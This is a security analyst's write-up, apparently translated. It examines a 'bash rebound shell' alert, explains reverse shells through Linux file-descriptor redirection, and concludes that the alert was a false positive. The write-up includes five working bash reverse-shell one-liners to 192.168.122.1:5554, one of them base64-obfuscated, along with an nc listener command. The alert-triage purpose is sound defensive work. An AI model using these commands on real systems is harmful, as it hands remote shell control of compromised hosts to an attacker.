(1) The compromised host initiates a reverse connection using the bash command

1.Cause

(One) Alarm Information

A security detection system of a certain host produced an alarm information named "bash rebound shell":

Initiator: IP1

Rebound Connection Command: /bin/bash /usr/bin/egrep -i processor|core id|physical id

Receiving Host: IP2 (80)

(Two) The Proposal of the Problem

Is the behavior of the relevant command in the alarm a rebound shell? What are the principles for judging bash rebound shell?

Below, we will conduct a simple study on the general implementation of bash rebound shell, summarize the principles for judging bash rebound shell, in preparation for similar events in the future.

Two,ReboundThe concept of shell

(1)What is rebound shell

Rebound shell (reverse shell) is the behavior where the control end listens to a specified TCP/UDP port, the controlled end actively connects to the listening port of the control end, and hands over the local machine's cmd shell to the control end. Rebound shell is relative to the "forward" shell such as telnet, ssh, etc., reversing the roles of client and server in the traditional concept.

(II)Applicable scenarios of rebound shell

• The compromised host is located behind the firewall, the firewall prohibits the external network from actively connecting to the compromised host, but allows the compromised host to initiate external connections.
• The IP address of the compromised host is dynamic, and the attacker will lose the connection after the IP changes.
• The compromised host is located in the internal network, connected to the external network through address translation, and the external host cannot actively connect to the compromised host.
• The specified port on the compromised host is occupied, and the Trojan backdoor program cannot listen to the preset port.

Three,File Descriptor and Redirect

File descriptor (File Descriptor, fd) in Linux has the following definition:

• File descriptor 0 represents standard input, which is default to the keyboard
• File descriptor 1 represents standard output, which is default to the monitor
• File descriptor 2 represents standard error, which is default to the monitor

Linux system only defines 0 to 2 as the usage of file descriptors, numbers above 3 can be specified for their usage. See the following example:

echo "12345678" > file.txt

exec 3<file.txt

grep "1234"<&3;

Output:

12345678

Explanation:

echo "12345678" > file.txt // Redirect 12345678 to the file, creating the file and writing the content

exec 3<file.txt // Create file descriptor 3 and point it to the file test.txt

grep "1234"<&3 // Use the file descriptor 3 specified file as the input of the grep command, and the final query got the result

Four,Rebound Shell Example

(1)The compromised host initiates a reverse connection using the bash command

Example 1:

bash -i >& /dev/tcp/192.168.122.1/5554 0>&1;

Explanation:

bash -i // Create an interactive bash process

/dev/tcp/192.168.122.1/5554 // Specify the file (establish a connection with the 5554 port of 192.168.122.1. In Linux systems, network connections are also considered as files)

>& // The writing style of cmd >& is equivalent to cmd >& file 2>&1, which means redirecting the standard output and standard error of bash to a file, which is the 5554 port of 192.168.122.1

0>&1 // Redirect the standard input of bash to standard output, and the standard output is at the 5554 port of 192.168.122.1, so 192.168.122.1 gets the standard output, standard output, and standard error of the compromised host, achieving a reverse shell

Example 2:

bash -i 5<>/dev/tcp/192.168.122.1/5554 0>&5 1>&5;

Explanation:

bash -i // Create an interactive bash process

5<>/dev/tcp/192.168.122.1/5554 // Point file descriptor 5 to the 5554 port of 192.168.122.1

0>&5 // Redirect the standard input to file descriptor 5, which is the 5554 port of 192.168.122.1

1>&5 // Redirect the standard output to file descriptor 5, which is the 5554 port of 192.168.122.1

Thus, 192.168.122.1 gets the standard input and standard output of the compromised host, although there is no standard error, but it also achieves a reverse shell

Example 3:

exec 5<>/dev/tcp/192.168.122.1/5554

cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done

Explanation:

exec 5<>/dev/tcp/192.168.122.1/5554 // Redirect file descriptor 5 to the 5554 port of 192.168.122.1

cat <&5 // Use cat to read the content of file descriptor 5, which means reading the input from the 5554 port of 192.168.122.1

| // Pipeline character, use the result of cat as the input for the following command

while read line; do $line >&5; done // In the while loop, read each line from file descriptor 5, execute it as a command, and then redirect the standard output and standard error to file descriptor 5, which is the 5554 port of 192.168.122.1

Example 4:

0<&56-;exec 56<>/dev/tcp/192.168.122.1/5554;sh <&56 >&56 2>&56;

Although there is an error, the reverse connection is successful.

Explanation:

0<&56- //Redirect standard input to file descriptor 56

exec 56<>/dev/tcp/192.168.122.1/5554 //Redirect file descriptor 56 to port 5554 of 192.168.122.1

sh <&56 >&56 2>&56 //Standard input is redirected to file descriptor 56, and the standard output and standard error are also redirected to file descriptor 56

Example 5:

Base64 encode the reverse connection command

bash -i >& /dev/tcp/192.168.122.1/5554 0>&1;

Encoded as:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzU1NTQgMD4mMQ==}|{base64,-d}|{bash,-i}

(II)The attacker isVPSAboveListen to the reverse connection

//Listen to the local 5554 port, and the shell can be obtained after the attacker runs the reverse command

nc -l -p 5554

Obtained a reverse shell.

VSummary

Through the above research on bash reverse shell, it can be known that in order to achieve a successful reverse connection, it is first necessary to specify the IP address and listening port of the VPS host to which the reverse connection is to be made, and then redirect the standard input, standard output, and standard error of the compromised host command line to the VPS. From this, it can be seen that the previous bash reverse shell alert information is not a reverse shell because there is no specification of the remote host and port in the bash command, nor is there any redirection operation, so it can be determined as a false positive.